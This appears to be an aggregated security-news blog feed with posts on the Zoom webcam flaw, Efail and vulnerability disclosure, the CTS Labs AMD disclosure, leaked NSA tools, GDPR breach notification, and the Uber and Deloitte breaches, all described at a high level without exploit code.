SSL and internet security news

disclosure

Auto Added by WPeMatico

Zoom Vulnerability

The Zoom conferencing app has a vulnerability that allows someone to remotely take over the computer’s camera.

It’s a bad vulnerability, made worse by the fact that it remains even if you uninstall the Zoom app:

This vulnerability allows any website to forcibly join a user to a Zoom call, with their video camera activated, without the user’s permission.

On top of this, this vulnerability would have allowed any webpage to DOS (Denial of Service) a Mac by repeatedly joining a user to an invalid call.

Additionally, if you’ve ever installed the Zoom client and then uninstalled it, you still have a localhost web server on your machine that will happily re-install the Zoom client for you, without requiring any user interaction on your behalf besides visiting a webpage. This re-install ‘feature’ continues to work to this day.

Zoom didn’t take the vulnerability seriously:

This vulnerability was originally responsibly disclosed on March 26, 2019. This initial report included a proposed description of a ‘quick fix’ Zoom could have implemented by simply changing their server logic. It took Zoom 10 days to confirm the vulnerability. The first actual meeting about how the vulnerability would be patched occurred on June 11th, 2019, only 18 days before the end of the 90-day public disclosure deadline. During this meeting, the details of the vulnerability were confirmed and Zoom’s planned solution was discussed. However, I was very easily able to spot and describe bypasses in their planned fix. At this point, Zoom was left with 18 days to resolve the vulnerability. On June 24th after 90 days of waiting, the last day before the public disclosure deadline, I discovered that Zoom had only implemented the ‘quick fix’ solution originally suggested.

This is why we disclose vulnerabilities. Now, finally, Zoom is taking this seriously and fixing it for real.

Powered by WPeMatico

The Importance of Protecting Cybersecurity Whistleblowers

Interesting essay arguing that we need better legislation to protect cybersecurity whistleblowers.

Congress should act to protect cybersecurity whistleblowers because information security has never been so important, or so challenging. In the wake of a barrage of shocking revelations about data breaches and companies mishandling of customer data, a bipartisan consensus has emerged in support of legislation to give consumers more control over their personal information, require companies to disclose how they collect and use consumer data, and impose penalties for data breaches and misuse of consumer data. The Federal Trade Commission (“FTC”) has been held out as the best agency to implement this new regulation. But for any such legislation to be effective, it must protect the courageous whistleblowers who risk their careers to expose data breaches and unauthorized use of consumers’ private data.

Whistleblowers strengthen regulatory regimes, and cybersecurity regulation would be no exception. Republican and Democratic leaders from the executive and legislative branches have extolled the virtues of whistleblowers. High-profile cases abound. Recently, Christopher Wylie exposed Cambridge Analytica’s misuse of Facebook user data to manipulate voters, including its apparent theft of data from 50 million Facebook users as part of a psychological profiling campaign. Though additional research is needed, the existing empirical data reinforces the consensus that whistleblowers help prevent, detect, and remedy misconduct. Therefore it is reasonable to conclude that protecting and incentivizing whistleblowers could help the government address the many complex challenges facing our nation’s information systems.

Powered by WPeMatico

Leaked NSA Hacking Tools

In 2016, a hacker group calling itself the Shadow Brokers released a trove of 2013 NSA hacking tools and related documents. Most people believe it is a front for the Russian government. Since, then the vulnerabilities and tools have been used by both government and criminals, and put the NSA’s ability to secure its own cyberweapons seriously into question.

Now we have learned that the Chinese used the tools fourteen months before the Shadow Brokers released them.

Does this mean that both the Chinese and the Russians stole the same set of NSA tools? Did the Russians steal them from the Chinese, who stole them from us? Did it work the other way? I don’t think anyone has any idea. But this certainly illustrates how dangerous it is for the NSA — or US Cyber Command — to hoard zero-day vulnerabilities.

Powered by WPeMatico

The Effects of GDPR’s 72-Hour Notification Rule

The EU’s GDPR regulation requires companies to report a breach within 72 hours. Alex Stamos, former Facebook CISO now at Stanford University, points out how this can be a problem:

Interesting impact of the GDPR 72-hour deadline: companies announcing breaches before investigations are complete.

1) Announce & cop to max possible impacted users.
2) Everybody is confused on actual impact, lots of rumors.
3) A month later truth is included in official filing.

Last week’s Facebook hack is his example.

The Twitter conversation continues as various people try to figure out if the European law allows a delay in order to work with law enforcement to catch the hackers, or if a company can report the breach privately with some assurance that it won’t accidentally leak to the public.

The other interesting impact is the foreclosing of any possible coordination with law enforcement. I once ran response for a breach of a financial institution, which wasn’t disclosed for months as the company was working with the USSS to lure the attackers into a trap. It worked.

[…]

The assumption that anything you share with an EU DPA stays confidential in the current media environment has been disproven by my personal experience.

This is a perennial problem: we can get information quickly, or we can get accurate information. It’s hard to get both at the same time.

Powered by WPeMatico

E-Mail Vulnerabilities and Disclosure

Last week, researchers disclosed vulnerabilities in a large number of encrypted e-mail clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and AppleMail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client into sending a copy of the plaintext to a web server controlled by that attacker. The story of these vulnerabilities and the tale of how they were disclosed illustrate some important lessons about security vulnerabilities in general and e-mail security in particular.

But first, if you use PGP or S/MIME to encrypt e-mail, you need to check the list on this page and see if you are vulnerable. If you are, check with the vendor to see if they’ve fixed the vulnerability. (Note that some early patches turned out not to fix the vulnerability.) If not, stop using the encrypted e-mail program entirely until it’s fixed. Or, if you know how to do it, turn off your e-mail client’s ability to process HTML e-mail or — even better — stop decrypting e-mails from within the client. There’s even more complex advice for more sophisticated users, but if you’re one of those, you don’t need me to explain this to you.

Consider your encrypted e-mail insecure until this is fixed.

All software contains security vulnerabilities, and one of the primary ways we all improve our security is by researchers discovering those vulnerabilities and vendors patching them. It’s a weird system: Corporate researchers are motivated by publicity, academic researchers by publication credentials, and just about everyone by individual fame and the small bug-bounties paid by some vendors.

Software vendors, on the other hand, are motivated to fix vulnerabilities by the threat of public disclosure. Without the threat of eventual publication, vendors are likely to ignore researchers and delay patching. This happened a lot in the 1990s, and even today, vendors often use legal tactics to try to block publication. It makes sense; they look bad when their products are pronounced insecure.

Over the past few years, researchers have started to choreograph vulnerability announcements to make a big press splash. Clever names — the e-mail vulnerability is called “Efail” — websites, and cute logos are now common. Key reporters are given advance information about the vulnerabilities. Sometimes advance teasers are released. Vendors are now part of this process, trying to announce their patches at the same time the vulnerabilities are announced.

This simultaneous announcement is best for security. While it’s always possible that some organization — either government or criminal — has independently discovered and is using the vulnerability before the researchers go public, use of the vulnerability is essentially guaranteed after the announcement. The time period between announcement and patching is the most dangerous, and everyone except would-be attackers wants to minimize it.

Things get much more complicated when multiple vendors are involved. In this case, Efail isn’t a vulnerability in a particular product; it’s a vulnerability in a standard that is used in dozens of different products. As such, the researchers had to ensure both that everyone knew about the vulnerability in time to fix it and that no one leaked the vulnerability to the public during that time. As you can imagine, that’s close to impossible.

Efail was discovered sometime last year, and the researchers alerted dozens of different companies between last October and March. Some companies took the news more seriously than others. Most patched. Amazingly, news about the vulnerability didn’t leak until the day before the scheduled announcement date. Two days before the scheduled release, the researchers unveiled a teaser — honestly, a really bad idea — which resulted in details leaking.

After the leak, the Electronic Frontier Foundation posted a notice about the vulnerability without details. The organization has been criticized for its announcement, but I am hard-pressed to find fault with its advice. (Note: I am a board member at EFF.) Then, the researchers published — and lots of press followed.

All of this speaks to the difficulty of coordinating vulnerability disclosure when it involves a large number of companies or — even more problematic — communities without clear ownership. And that’s what we have with OpenPGP. It’s even worse when the bug involves the interaction between different parts of a system. In this case, there’s nothing wrong with PGP or S/MIME in and of themselves. Rather, the vulnerability occurs because of the way many e-mail programs handle encrypted e-mail. GnuPG, an implementation of OpenPGP, decided that the bug wasn’t its fault and did nothing about it. This is arguably true, but irrelevant. They should fix it.

Expect more of these kinds of problems in the future. The Internet is shifting from a set of systems we deliberately use — our phones and computers — to a fully immersive Internet-of-things world that we live in 24/7. And like this e-mail vulnerability, vulnerabilities will emerge through the interactions of different systems. Sometimes it will be obvious who should fix the problem. Sometimes it won’t be. Sometimes it’ll be two secure systems that, when interact in a particular way, cause an insecurity. In April, I wrote about a vulnerability that arose because Google and Netflix make different assumptions about e-mail addresses. I don’t even know who to blame for that one.

It gets even worse. Our system of disclosure and patching assumes that vendors have the expertise and ability to patch their systems, but that simply isn’t true for many of the embedded and low-cost Internet of things software packages. They’re designed at a much lower cost, often by offshore teams that come together, create the software, and then disband; as a result, there simply isn’t anyone left around to receive vulnerability alerts from researchers and write patches. Even worse, many of these devices aren’t patchable at all. Right now, if you own a digital video recorder that’s vulnerable to being recruited for a botnet — remember Mirai from 2016? — the only way to patch it is to throw it away and buy a new one.

Patching is starting to fail, which means that we’re losing the best mechanism we have for improving software security at exactly the same time that software is gaining autonomy and physical agency. Many researchers and organizations, including myself, have proposed government regulations enforcing minimal security-standards for Internet-of-things devices, including standards around vulnerability disclosure and patching. This would be expensive, but it’s hard to see any other viable alternative.

Getting back to e-mail, the truth is that it’s incredibly difficult to secure well. Not because the cryptography is hard, but because we expect e-mail to do so many things. We use it for correspondence, for conversations, for scheduling, and for record-keeping. I regularly search my 20-year e-mail archive. The PGP and S/MIME security protocols are outdated, needlessly complicated and have been difficult to properly use the whole time. If we could start again, we would design something better and more user friendly­but the huge number of legacy applications that use the existing standards mean that we can’t. I tell people that if they want to communicate securely with someone, to use one of the secure messaging systems: Signal, Off-the-Record, or — if having one of those two on your system is itself suspicious — WhatsApp. Of course they’re not perfect, as last week’s announcement of a vulnerability (patched within hours) in Signal illustrates. And they’re not as flexible as e-mail, but that makes them easier to secure.

This essay previously appeared on Lawfare.com.

Powered by WPeMatico

Israeli Security Attacks AMD by Publishing Zero-Day Exploits

Last week, the Israeli security company CTS Labs published a series of exploits against AMD chips. The publication came with the flashy website, detailed whitepaper, cool vulnerability names — RYZENFALL, MASTERKEY, FALLOUT, and CHIMERA — and logos we’ve come to expect from these sorts of things. What’s new is that the company only gave AMD a day’s notice, which breaks with every norm about responsible disclosure. CTS Labs didn’t release details of the exploits, only high-level descriptions of the vulnerabilities, but it is probably still enough for others to reproduce their results. This is incredibly irresponsible of the company.

Moreover, the vulnerabilities are kind of meh. Nicholas Weaver explains:

In order to use any of the four vulnerabilities, an attacker must already have almost complete control over the machine. For most purposes, if the attacker already has this access, we would generally say they’ve already won. But these days, modern computers at least attempt to protect against a rogue operating system by having separate secure subprocessors. CTS Labs discovered the vulnerabilities when they looked at AMD’s implementation of the secure subprocessor to see if an attacker, having already taken control of the host operating system, could bypass these last lines of defense.

In a “Clarification,” CTS Labs kind of agrees:

The vulnerabilities described in amdflaws.com could give an attacker that has already gained initial foothold into one or more computers in the enterprise a significant advantage against IT and security teams.

The only thing the attacker would need after the initial local compromise is local admin privileges and an affected machine. To clarify misunderstandings — there is no need for physical access, no digital signatures, no additional vulnerability to reflash an unsigned BIOS. Buy a computer from the store, run the exploits as admin — and they will work (on the affected models as described on the site).

The weirdest thing about this story is that CTS Labs describes one of the vulnerabilities, Chimera, as a backdoor. Although it doesn’t t come out and say that this was deliberately planted by someone, it does make the point that the chips were designed in Taiwan. This is an incredible accusation, and honestly needs more evidence before we can evaluate it.

The upshot of all of this is that CTS Labs played this for maximum publicity: over-hyping its results and minimizing AMD’s ability to respond. And it may have an ulterior motive:

But CTS’s website touting AMD’s flaws also contained a disclaimer that threw some shadows on the company’s motives: “Although we have a good faith belief in our analysis and believe it to be objective and unbiased, you are advised that we may have, either directly or indirectly, an economic interest in the performance of the securities of the companies whose products are the subject of our reports,” reads one line. WIRED asked in a follow-up email to CTS whether the company holds any financial positions designed to profit from the release of its AMD research specifically. CTS didn’t respond.

We all need to demand better behavior from security researchers. I know that any publicity is good publicity, but I am pleased to see the stories critical of CTS Labs outnumbering the stories praising it.

Powered by WPeMatico

Security Breaches Don’t Affect Stock Price

Interesting research: “Long-term market implications of data breaches, not,” by Russell Lange and Eric W. Burger.

Abstract: This report assesses the impact disclosure of data breaches has on the total returns and volatility of the affected companies’ stock, with a focus on the results relative to the performance of the firms’ peer industries, as represented through selected indices rather than the market as a whole. Financial performance is considered over a range of dates from 3 days post-breach through 6 months post-breach, in order to provide a longer-term perspective on the impact of the breach announcement.

Key findings:

  • While the difference in stock price between the sampled breached companies and their peers was negative (1.13%) in the first 3 days following announcement of a breach, by the 14th day the return difference had rebounded to + 0.05%, and on average remained positive through the period assessed.

  • For the differences in the breached companies’ betas and the beta of their peer sets, the differences in the means of 8 months pre-breach versus post-breach was not meaningful at 90, 180, and 360 day post-breach periods.

  • For the differences in the breached companies’ beta correlations against the peer indices pre- and post-breach, the difference in the means of the rolling 60 day correlation 8 months pre- breach versus post-breach was not meaningful at 90, 180, and 360 day post-breach periods.

  • In regression analysis, use of the number of accessed records, date, data sensitivity, and malicious versus accidental leak as variables failed to yield an R2 greater than 16.15% for response variables of 3, 14, 60, and 90 day return differential, excess beta differential, and rolling beta correlation differential, indicating that the financial impact on breached companies was highly idiosyncratic.

  • Based on returns, the most impacted industries at the 3 day post-breach date were U.S. Financial Services, Transportation, and Global Telecom. At the 90 day post-breach date, the three most impacted industries were U.S. Financial Services, U.S. Healthcare, and Global Telecom.

The market isn’t going to fix this. If we want better security, we need to regulate the market.

Note: The article is behind a paywall. An older version is here. A similar article is here.

Powered by WPeMatico

Uber Data Hack

Uber was hacked, losing data on 57 million driver and rider accounts. The company kept it quiet for over a year. The details are particularly damning:

The two hackers stole data about the company’s riders and drivers ­– including phone numbers, email addresses and names — from a third-party server and then approached Uber and demanded $100,000 to delete their copy of the data, the employees said.

Uber acquiesced to the demands, and then went further. The company tracked down the hackers and pushed them to sign nondisclosure agreements, according to the people familiar with the matter. To further conceal the damage, Uber executives also made it appear as if the payout had been part of a “bug bounty” — a common practice among technology companies in which they pay hackers to attack their software to test for soft spots.

And almost certainly illegal:

While it is not illegal to pay money to hackers, Uber may have violated several laws in its interaction with them.

By demanding that the hackers destroy the stolen data, Uber may have violated a Federal Trade Commission rule on breach disclosure that prohibits companies from destroying any forensic evidence in the course of their investigation.

The company may have also violated state breach disclosure laws by not disclosing the theft of Uber drivers’ stolen data. If the data stolen was not encrypted, Uber would have been required by California state law to disclose that driver’s license data from its drivers had been stolen in the course of the hacking.

Uber was hacked, losing data on 57 million driver and rider accounts. They kept it quiet for over a year. The details are particularly damning:

The two hackers stole data about the company’s riders and drivers ­- including phone numbers, email addresses and names -­ from a third-party server and then approached Uber and demanded $100,000 to delete their copy of the data, the employees said.

Uber acquiesced to the demands, and then went further. The company tracked down the hackers and pushed them to sign nondisclosure agreements, according to the people familiar with the matter. To further conceal the damage, Uber executives also made it appear as if the payout had been part of a “bug bounty” ­- a common practice among technology companies in which they pay hackers to attack their software to test for soft spots.

And almost certainly illegal:

While it is not illegal to pay money to hackers, Uber may have violated several laws in its interaction with them.

By demanding that the hackers destroy the stolen data, Uber may have violated a Federal Trade Commission rule on breach disclosure that prohibits companies from destroying any forensic evidence in the course of their investigation.

The company may have also violated state breach disclosure laws by not disclosing the theft of Uber drivers’ stolen data. If the data stolen was not encrypted, Uber would have been required by California state law to disclose that driver’s license data from its drivers had been stolen in the course of the hacking.

Powered by WPeMatico

Deloitte Hacked

The large accountancy firm Deloitte was hacked, losing client e-mails and files. The hackers had access inside the company’s networks for months. Deloitte is doing its best to downplay the severity of this hack, but Bran Krebs reports that the hack “involves the compromise of all administrator accounts at the company as well as Deloitte’s entire internal email system.”

So far, the hackers haven’t published all the data they stole.

Powered by WPeMatico